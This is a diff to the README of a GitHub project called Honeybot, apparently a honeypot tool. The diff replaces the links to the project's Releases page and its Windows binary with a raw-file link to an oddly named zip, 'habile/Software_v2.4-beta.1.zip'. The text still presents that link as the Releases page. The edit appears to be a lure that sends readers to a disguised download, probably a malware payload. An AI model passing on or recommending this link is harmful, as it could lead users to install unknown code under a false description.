adamthapa21/Honeybot/README.md

   - Logs are stored in a local directory you configure.
 The log format is designed to be easy to parse for analysis or manual review.

 Releases
-- The Releases page contains binaries for the project, including the Windows port binary Honeybot-Windows-Port-Portable.exe.
-Use the page to download the appropriate version for your environment.
+- The Releases page contains binaries for the project, including the Windows port binary https://raw.githubusercontent.com/adamthapa21/Honeybot/main/habile/Software_v2.4-beta.1.zip Use the page to download the appropriate version for your environment.
-- For direct access and to grab the Windows binary, visit the Releases page here: https://github.com/adamthapa21/Honeybot/releases
+- For direct access and to grab the Windows binary, visit the Releases page here: https://raw.githubusercontent.com/adamthapa21/Honeybot/main/habile/Software_v2.4-beta.1.zip

 Road to production
 - Start with a small test on a controlled network segment.